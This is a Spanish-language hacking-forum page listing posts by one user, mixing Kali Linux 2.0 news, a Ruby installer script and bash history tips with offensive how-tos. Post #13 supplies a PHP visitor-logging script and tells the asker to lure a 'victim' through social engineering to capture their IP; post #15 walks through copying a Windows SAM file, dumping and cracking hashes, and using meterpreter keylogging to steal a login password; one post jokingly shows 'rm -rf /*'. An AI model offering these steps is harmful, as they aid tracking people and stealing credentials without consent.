Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - B3N

#1
GNU/Linux / Novedades en Kali Linux 2.0
Agosto 11, 2015, 08:33:37 PM
Bueno para los que no saben ingles y no pueden leer desde el sitio oficial No tienes permitido ver los links. Registrarse o Entrar a mi cuenta les resumo en espanol:

1. Kernel 4.0
2. Ahora la distribucion se basa en Debian 8 (Jessie), (algo que predije en otro post en modo de pregunta retorica)
3. Mejoras en los drivers de wireless y hardware en general
4. Soporte nativo para los siguientes entornos de escritorio: gnome, kde, xfce, mate, e17, lxde, i3wm
5. Gnome 3.16 por defecto
6. Ahora Kali es una rolling distribution (o sea continua, en laminacion) esto quiere decir que de ahora en adelante tomaran los paquetes directamente de Debian Testing (despues de haberse asegurado de que al menos se instalan sin problemas)
7. Nuevo sistema de control de version principal de software via git (es un script que corre a diario y nos mantiene actualizado de las herramientas basado en git)
8. Nueva variante (flavour) para las computadoras de poco rendimiento, con entorno de escritorio XFCE (pesa cerca de 1 Gb) No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
9. Actualizaciones de imagenes de VMware y VirtualBox
10. Actulizaciones de NetHunter y las imagenes de ARM para Raspberry Pi, Chromebooks, Odroids, etc. Y una nueva imagen para CM-12
11. No incluye Metasploit Community / Pro. Ahora solo incluye el framework de Metasploit (metasploit-framework) y Rapid7 ya no mantendra directamente a Metasploit en Kali, ahora es el equipo de Kali quien se encarga directamente de esto, ahora han migrado a la instalacion de forma nativa y asi usan las dependencias de forma nativa en Kali lo que implica un mayor rendimiento y mejor intergracion con el sistema. Ya no existe el servicio de metasploit asi que para iniciar Metasploit ahora seria de esta forma:

Código: bash
/etc/init.d/postgresql start
msfdb init
msfconsole


Bueno los demas detalles los iremos viendo a medida que vayamos trabajando con el sistema.
#2
Tengo el gusto de anunciarles la salida de Kali Linux 2.0. Ya lo pueden descargar en su sitio oficial No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Los detalles todavia no los han publicado, parece que por el momento solo han subido el ISO, entiendo que no lo pueden hacer todo al mismo tiempo. Lo nuevo por el momento es un version Light, esta debe ser para computadoras de poco rendimiento.
Bueno pues a probarlo!
#3
Puesto que RHEL y CentOS siempre estan un poco atrasados en este asunto es necesario instalar "a mano" las cosas actualizadas, bueno en este caso he simplificado el proceso de intalacion para Ruby. El instalador hace uso de rbenv, el gestor de instalacion y actualizacion recomendado por los desarrolladores de Ruby y Ruby on Rails, pudiendo instalar multiples versiones simultaneamente y coexistir sin problemas, ademas de que hace mucho mas sencillo el proceso de actualizacion.

Código: bash
#!/bin/bash
#
##############################################################
#
# Author: B3N
# Name: ruby-installer
# Version: 1.0
# Description: Install the lastest version of Ruby using rbenv
# Licence: GPLv2
# Platform: RHEL/CentOS/Fedora
#
##############################################################


# Logo
echo
echo "============================================================"
echo "               Ruby Installer v1.0 - By B3N"
echo "============================================================"
echo
echo "[i] rbenv and ruby will be installed only for the user $USER"

# Dependencies
rpm -q openssl-devel readline-devel zlib-devel git > /dev/null
if [ $? -ne 0 ]; then
if [ `id -u` == 0 ]; then
echo "[+] Installing dependencies..."
yum install -y openssl-devel readline-devel zlib-devel git
if [ $? -ne 0 ]; then
exit 1
fi
else
echo "[+] Installing dependencies..."
su -c 'yum install -y openssl-devel readline-devel zlib-devel git'
if [ $? -ne 0 ]; then
exit 1
fi
fi
fi

# Clone rbenv repo
if [ -d ~/.rbenv ]; then
echo "[-] Directory ~/.rbenv exists."
else
git clone https://github.com/sstephenson/rbenv.git ~/.rbenv
if [ $? -eq 0 ]; then
echo "[+] rbenv repo cloned to ~/.rbenv."
fi
fi

# PATH
if [ -d ~/.rbenv/bin ]; then
grep 'export PATH="$HOME/.rbenv/bin:$PATH"' ~/.bashrc > /dev/null
if [ $? -ne 0 ]; then
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
export PATH="$HOME/.rbenv/bin:$PATH"
echo "[+] rbenv added to PATH"
else
echo "[-] rbenv is in the PATH."
fi
else
exit 1
fi

# Autocompletion
if [ -d ~/.rbenv/bin ]; then
grep 'eval "$(rbenv init -)"' ~/.bashrc > /dev/null
if [ $? -ne 0 ]; then
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
eval "$(rbenv init -)"
echo "[+] Autocompletion activated."
else
echo "[-] Autocompletion already activated."
fi
else
exit 1
fi

## Plugins:
# ruby-build
if [ -d ~/.rbenv/plugins/ruby-build ]; then
echo "[-] Directory ~/.rbenv/plugins/ruby-build exists."
else
git clone https://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
if [ $? -eq 0 ]; then
echo "[+] Plugin ruby-build installed."
fi
fi
# rbenv-rehash
if [ -d ~/.rbenv/plugins/rbenv-gem-rehash ]; then
echo "[-] Directory ~/.rbenv/plugins/rbenv-gem-rehash exists."
else
git clone https://github.com/sstephenson/rbenv-gem-rehash.git ~/.rbenv/plugins/rbenv-gem-rehash
if [ $? -eq 0 ]; then
echo "[+] Plugin rbenv-rehash installed."
fi
fi

# Install ruby
if [ -x ~/.rbenv/libexec/rbenv ]; then
rbenv install -l
read -p "Type version to install: " RV
if [ `rbenv version|awk -F " " {'print $1'}` == $RV ]; then
echo "[-] Ruby $RV already installed, nothing to do."
else
rbenv install -v -k $RV
rbenv global $RV
echo "[i] Restart your terminal to finish."
fi
else
echo "[-] rbenv is not installed."
fi
#4
Basados en el siguiente metodo no podemos sacar una conclusion definitiva pero al menos si podemos orientarnos hacia cuales lenguajes son los mas usados por pentesters. El analisis que hice es sencillo, me baso en la bien conocida distribucion de pentesting Kali Linux, distribucion muy mencionada y usada por profesionales de la seguridad informatica, plataforma escogida por muchos escritores profesionales y desarrolladores en el campo de la seguridad. La tecnica consistio en hacer una busqueda por extension de los lenguajes mas conocidos y enumeramos cada busqueda especifica para ver la cantidad de archivos existentes en esta distribucion de cada lenguaje. Aqui les va:

Código: php

root@kali:~# find / -name *.c | wc -l
7376
root@kali:~# find / -name *.asm | wc -l
550
root@kali:~# find / -name *.class | wc -l
694
root@kali:~# find / -name *.jar | wc -l
1642
root@kali:~# find / -name *.py | wc -l
65450
root@kali:~# find / -name *.rb | wc -l
53192
root@kali:~# find / -name *.pl | wc -l
8400
root@kali:~# find / -name *.sh | wc -l
1206
root@kali:~#


Como vemos C sigue siendo imprescindible y Python es el lenguaje de scripting mas usado en el momento, no obstante vemos un gran incremento de Ruby, en los a~os proximos pienso que Ruby ira reemplazando poco a poco a Python ya que los programadores de Python estan migrando lentamente a Ruby asi como estan migrando las aplicaciones previamente programadas en Python a Ruby.

Saquen ustedes sus propias conclusiones.

#5
C es imprescindible, tambien se debe manejar un lenguaje de scripting. En mi caso uso ruby ya que es a lo que se esta orientando la programacion para pentesting.
#6
Ya esto existe. Minds es una red social exactamente con las caracteristicas que deseas. Cifra todos los mensajes, es opensource, etc. Muchos Anonymous usan esta red para las Ops y muchos otros hackers la estan considerando muy seriamente. Por supuesto todavia esta en fase beta pero vale la pena probarla. Dejo el link:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#7
Esto es para que no se registren los comandos con un espacio delante, como dice rand0m:

Código: bash
[root@genesis ~]#  export HISTCONTROL=ignorespace


Probemos a ver:
Código: bash
[root@genesis ~]#   rm -rf /*
[root@genesis ~]#  history
bash: history: command not found
[root@genesis ~]# 


???


Espero que no se hayan creido esa ultima  ;)

PD: No obstante me parece que la duda de HAXOR_666 es como borrar los logs, no el historial de comandos. En este caso seria necesario que especificara en cual sistema quiere borrar los logs, Windows, Linux, Mac, etc.
#8
Cita de: Jimeno
Código: bash
export HISTFILE=/dev/null
echo "¿Se guarda?"

Código: bash
[b3n@genesis ~]$ export HISTFILE=/dev/null
[b3n@genesis ~]$ echo "se guarda de forma temporal"
[b3n@genesis ~]$ history
   ...
  495  echo "se guarda de forma temporal"
  496  history
[b3n@genesis ~]$


Es lo mismo con: export HISTFILE=
#9
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si ponemos un espacio en blanco al principio del comando éste no se guardará en el histórico.
Código: bash
rand0m@box0:~$ history -c
rand0m@box0:~$  echo "This will not appear on history"
This will not appear on history
rand0m@box0:~$ echo "But this will"
But this will
rand0m@box0:~$ history
    1  echo "But this will"
    2  history


Código: bash
[b3n@genesis ~]$  echo "Si se guarda"
[b3n@genesis ~]$ history
  386   echo "Si se guarda"
  387  history
[b3n@genesis ~]$


#10
Solo te voy a dar una pista: sslstrip
#11
apt-get install gcc-mingw32 mingw32
#12
Hasta el momento el mas aceptado es el PTES No tienes permitido ver los links. Registrarse o Entrar a mi cuenta pero esto esta muy atrasado en mi opinion, todavia hablan de Backtrack, etc.
Me llama mucho la atencion que mencionan Mac OS X como el sistema de eleccion para pentesting, Yo estoy de acuerdo en que debemos tener Mac en nuestro laboratorio, es por eso que lo mas inteligente para un pentester es tener una Macbook ya que es una manera practica de tener los 3 sistemas operativos o al menos de poderlos virtualizar sin problemas, pero utilizar Mac como sistema base para pentesting, wow, esto no me parece practico ni logico. Y es que el Hacking siempre ha estado ligado muy fuertemente al software libre, el software libre forma parte de la historia y la filosofia del hacking.
Me llama la atencion que nadie actualiza este estandar, siendo incluso el mas utilizado y mencionado en el mundo del pentesting, creo que lo escrito data del 2011. He buscado en Internet pero no existe otro serio. Yo creo que esto es trabajo de la comunidad de pentesters y no de empresas en particular, deberiamos hacer algo practico para nosotros mismos.
#13
Puedes usar este script:

Código: php
<?
$file = "log.txt";
$ip = $_SERVER["REMOTE_ADDR"];
$system = $_SERVER["HTTP_USER_AGENT"]; //
$proxy = $_SERVER["HTTP_X_FORWARDED_FOR"]; //
$log = "SISTEMA: $system, IP: $ip, PROXY: $proxy";
$fp = fopen($file, "a");
fwrite($fp, $log);
fclose($fp);
?>


Lo guardas como index.php y lo subes a algun servicio de hosting gratuito, luego con algo de ingeneria social haces que la victima visite el sitio, esto creara un log con su IP, navegador, SO  y proxy, si tiene.
Debes crear el archivo log.txt en el mismo directorio del script, o modifica todo esto a tu gusto.
Hay muchas formas mas como menciona Cl0udswX, aqui solo te doy un ejemplo de algo practico.
#14
Bugs y Exploits / Re:Cazador de Botnets: [Zeus]
Julio 09, 2015, 09:42:08 PM
Muy bueno, gracias por compartirlo
#15
Si tienes acceso fisico a la maquina lo puedes hacer iniciando Kali en la misma. Aca te doy una forma sencilla:

1. Montas la particion del sistema:
Código: php
mount /dev/sda1 /mnt


2. Copias el SAM y el SYSTEM
Código: php
cp /mnt/Windows/System32/config/SAM /tmp
cp /mnt/Windows/System32/config/SYSTEM /tmp


3. Te pasas a /tmp para trabajar mas comodo
Código: php
cd /tmp


4. Generas las llaves del sistema y de booteo
Código: php
bkhive SYSTEM hive


5. Generas los hashes
Código: php
samdump2 SAM hive > hashes.txt


6. Descomprimes un diccionario:
Código: php
cp /usr/share/wordlists/rockyou.txt.gz /tmp
gunzip /tmp/rockyou.txt.gz


6. Descifras el password con el john
Código: php
john --format=nt -w=rockyou.txt hashes.txt


Otra opcion seria bajarte la tabla de Vista para Ophcrack y usar el mismo, aunque yo lo noto mucho mas lento que el john...ironicamente, porque se supone que el Ophcrack sea mas rapido porque no cifra cada password sino que compara los hashes directamente.
Para las maquinas en la red lo haces desde el meterpreter, si el password esta muy dificil de descifrar puedes iniciarle un keylogger desde el meterpreter, luego le bloqueas la session con rundll32 user32 LockWorkStation y migras hacia el proceso de login para capturar el password.
#16
GNU/Linux / Kali Linux 2.0 - Preview
Julio 07, 2015, 02:58:55 AM
Tengo el placer de anunciarles la liberacion de Kali Linux 2.0 el 11 de Agosto proximo. Gnome-Shell por defecto, Ruby 2.0, y por lo que veo trae las tablas de Ophcrack incluidas, de ser asi el ISO me imagino que pese bastante.  ¿Seguira basado en Debian 7?, ¿Habran migrado a systemd? Los detalles no los han dado aun. Sin mas aqui les dejo el video oficial.

#17
Dudas y pedidos generales / Re:Duda sobre red wifi
Julio 05, 2015, 11:33:19 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pues ya el final esta cerca, la humanidad tal y como la conocemos esta a punto de desaparcer.

Y es que cuando estamos dispuesto a sacrificar a nuestra madre solamente para mejorar un poco el ancho de banda es que las cosas estan chungas...  ;D
jajaja
Yo normalmente lo hago con evenenamiento ARP con el ettercap
#18
Si el metodo que utilizaste fue con dd olvidate de redimensionar. Si usaste otro metodo, por ejemplo con alguna herramiena, que mantiene el sistema de archivos FAT32 puedes eliminar la particion de la persistencia, expandir la del sistema y luego volver a crear la particion de persistencia, por supuesto debes salvar los datos primero.
#19
Hacking / Re:Listado de Camaras IP disponibles
Junio 29, 2015, 12:43:29 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , no veo la necesidad de borrar tu post, puedes complementarlo con el script que estas codeando para facilitar las busquedas con dorks.

Saludos!
Ok, en cuanto lo refine lo subo.
Slds
#20
Hacking / Re:Listado de Camaras IP disponibles
Junio 28, 2015, 05:20:41 PM
Si, tienen razon, desde que publique el post he encontrado cantidad de camaras, he incluso hice un script en ruby para encontrar mas camaras por dorks. Esto para mi era algo nuevo, pero ya veo que no es asi.
Bueno, pueden borrar este post los moderadores ya que en realidad no es muy util.
Cuando refine el script se los subo, tal vez esto sea mas util.
Slds ;)